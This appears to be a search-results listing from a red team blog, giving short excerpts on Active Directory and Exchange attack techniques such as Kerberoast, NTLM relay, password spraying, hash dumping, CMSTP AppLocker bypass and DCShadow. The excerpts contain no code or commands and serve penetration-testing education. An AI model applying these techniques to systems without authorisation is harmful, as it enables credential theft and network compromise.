118 matches found
Microsoft Exchange – Privilege Escalation
Harvesting the credentials of a domain user during a red team operation can lead to execution of arbitrary code, persistence and domain escalation. However information that is stored over emails can be highly sensitive for an organisation and therefore threat actors focus can be to exfiltrate dat...
Microsoft Exchange – ACL
During Microsoft Exchange installation a number of security groups are created in the Active Directory related to Exchange. Some of these groups are linked to each other and could allow domain escalation via abuse of access control lists. Specifically user accounts that are a member of Organisati...
Microsoft Exchange – Mailbox Post Compromise
Gaining access to the mailbox of a domain user give the opportunity for a list of activities that could potentially expand the access of the red team. The trust relationships of the compromised user can be utilised to perform a more efficient Phishing or NTLM relay attack in order to gain access ...
Microsoft Exchange – Code Execution
Gaining access to the mailbox of a domain user can lead to execution of arbitrary code by utilising the credentials that have been discovered. Various techniques have been discovered by Nick Landers and Etienne Stalmans that involve the abuse of Outlook common functionality in order to execute...
Microsoft Exchange – NTLM Relay
Gaining access to the mailbox of a user during a penetration test or a red team engagement can lead to arbitrary code execution, discovery of sensitive data such as credentials or performing internal Phishing to expand access across the network. Typically access to the mailbox is achieved via...
Microsoft Exchange – Password Spraying
Outlook Web Access OWA portals typically are externally facing in order to allow users to get access to their emails from the Internet. This gives the opportunity to threat actors to use a common password against a valid list of usernames Password Spraying in order to get some initial access to t...
Microsoft Exchange – Domain Escalation
Microsoft Exchange servers are a high valuable target for red teams as they are the main entry point for the majority of the external attacks. From the internal perspective and if initial foothold to the network has been already achieved can allow a user to obtain privileges that would allow him ...
Dumping Domain Password Hashes
It is very common during penetration tests where domain administrator access has been achieved to extract the password hashes of all the domain users for offline cracking and analysis. These hashes are stored in a database file in the domain controller NTDS.DIT with some additional information li...
Kerberoast
The process of cracking Kerberos service tickets and rewriting them in order to gain access to the targeted service is called Kerberoast. This is very common attack in red team engagements since it doesn't require any interaction with the service as legitimate active directory access can be used ...
Command and Control – Browser
Red Teams are always focused in the discovery of innovative ways to establish connections back to their command and control infrastructure. The main reasons that leads red teams to use standard protocols or native system functionality for command and control operations is to bypass some sort of...
SPN Discovery
Services that support Kerberos authentication require to have a Service Principal Name SPN associated to point users to the appropriate resource for connection. Discovery of SPNs inside an internal network is performed via LDAP queries and can assist red teams to identify hosts that are running...
Situational Awareness
A common step in the life-cycle of a red team engagement is to gather as much information is possible for the compromised environments and the domain network. This activity is often called situational awareness and there is no defined list of commands that a red teamer should execute. However all...
Lateral Movement – WinRM
WinRM stands for Windows Remote Management and is a service that allows administrators to perform management tasks on systems remotely. Communication is performed via HTTP 5985 or HTTPS SOAP 5986 and support Kerberos and NTLM authentication by default and Basic authentication. Usage of this servi...
AppLocker Bypass – CMSTP
CMSTP is a binary which is associated with the Microsoft Connection Manager Profile Installer. It accepts INF files which can be weaponised with malicious commands in order to execute arbitrary code in the form of scriptlets SCT and DLL. It is a trusted Microsoft binary which is located in the...
PDF – NTLM Hashes
Client side attacks are heavily used in red team engagements as they can allow the red team to execute arbitrary code or retrieve password hashes. Usually Microsoft office products are used to perform these kind of attacks however PDF documents can be also utilized for obtaining NTLM hashes of...
NBNS Spoofing
Netbios Name Service NBT-NS is used in Windows networks for communication between hosts. Systems will use this service when resolving names over LHOSTS and DNS fail. Abusing this service to perform a Man-in-the-middle attack is a common tactic that has been widely used by penetration testers and...
Lateral Movement – RDP
The Remote Desktop Protocol RDP is widely used across internal networks by Administrators. This allows systems owners and admins to manage Windows environments remotely. However RDP can give various opportunities to an attacker to conduct attacks that can be used for lateral movement in red team...
DCShadow
The DCShadow is an attack which tries to modify existing data in the Active Directory by using legitimate API's which are used by domain controllers. This technique can be used in a workstation as a post-domain compromise tactic for establishing domain persistence bypassing most SIEM solutions...